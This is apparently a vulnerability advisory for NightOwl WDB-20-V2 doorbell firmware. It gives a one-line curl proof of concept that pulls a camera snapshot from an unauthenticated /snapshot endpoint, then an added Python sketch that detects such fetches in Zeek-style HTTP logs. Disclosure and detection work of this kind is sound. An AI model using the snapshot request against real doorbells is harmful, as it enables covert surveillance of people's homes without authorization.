@tj-oconnor
Created April 24, 2021 14:13
Description:
An issue exists in the NightOwl WDB-20-V2 Doorbell camera that allows an unauthenticated user to gain access to snapshots and video streams from the doorbell. The binary "app" running on firmware WDB-20-V2_20190314 offers a web server on port 80 that allows an unauthenticated user to take a snapshot from the doorbell camera via "http://<IP>/snapshot".
Affected Components:
Firmware: WDB-20-V2_20190314, binary:"app"
Further Information:
The binary "app" provides undocumented functionality on a web server, including a "snapshot" function that enables unauthenticated users to take a snapshot of the camera.
https://cloud.binary.ninja/embed/f4400a22-c438-403a-bf2a-939ca44a4f6b
Proof of Concept:
$ curl http://<IP>/snapshot --output snapshot.jpg
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 12442  100 12442    0     0  15191      0 --:--:-- --:--:-- --:--:-- 15173
$ file snapshot.jpg
snapshot.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 640x360, components 3
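
Detection sketch for the exposure described above, added here as an example and not part of the original advisory: it scans HTTP records shaped like Zeek's JSON http.log for successful JPEG fetches of /snapshot from the doorbell and rates each by source address. The camera address, the trusted subnet and the log lines are constructed assumptions.

```python
import ipaddress
import json
from urllib.parse import urlsplit

# Assumptions (constructed for this example): the doorbell's address and the
# management subnet that is expected to talk to it.
DOORBELLS = {"192.0.2.20"}
TRUSTED = [ipaddress.ip_network("192.0.2.0/28")]

# Constructed sample records, one JSON object per line (Zeek http.log field names).
SAMPLE_LOG = """\
{"ts": 1619273580.1, "id.orig_h": "192.0.2.5", "id.resp_h": "192.0.2.20", "id.resp_p": 80, "method": "GET", "uri": "/snapshot", "status_code": 200, "resp_mime_types": ["image/jpeg"], "response_body_len": 12442}
{"ts": 1619273611.7, "id.orig_h": "198.51.100.9", "id.resp_h": "192.0.2.20", "id.resp_p": 80, "method": "GET", "uri": "/snapshot?x=1", "status_code": 200, "resp_mime_types": ["image/jpeg"], "response_body_len": 12390}
{"ts": 1619273650.2, "id.orig_h": "198.51.100.9", "id.resp_h": "192.0.2.20", "id.resp_p": 80, "method": "GET", "uri": "/index.html", "status_code": 404}
{"ts": 1619273700.0, "id.orig_h": "198.51.100.9", "id.resp_h": "192.0.2.77", "id.resp_p": 80, "method": "GET", "uri": "/snapshot", "status_code": 200, "resp_mime_types": ["image/jpeg"]}
not-json garbage line
"""

def is_trusted(src):
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return False  # missing or malformed source address is never trusted
    return any(addr in net for net in TRUSTED)

def find_snapshot_pulls(log_text):
    """Return one finding per successful /snapshot image fetch from a doorbell."""
    findings = []
    for line in log_text.splitlines():
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or non-JSON lines
        if not isinstance(rec, dict):
            continue
        if rec.get("id.resp_h") not in DOORBELLS or rec.get("id.resp_p") != 80:
            continue
        path = urlsplit(rec.get("uri", "")).path.rstrip("/")  # ignore query string
        served = rec.get("status_code") == 200 and "image/jpeg" in rec.get("resp_mime_types", [])
        if path != "/snapshot" or not served:
            continue
        src = rec.get("id.orig_h", "")
        # The endpoint asks for no credentials, so the source address is the only signal.
        findings.append({"ts": rec.get("ts"), "src": src, "severity": "info" if is_trusted(src) else "high"})
    return findings

if __name__ == "__main__":
    for finding in find_snapshot_pulls(SAMPLE_LOG):
        print(finding)
```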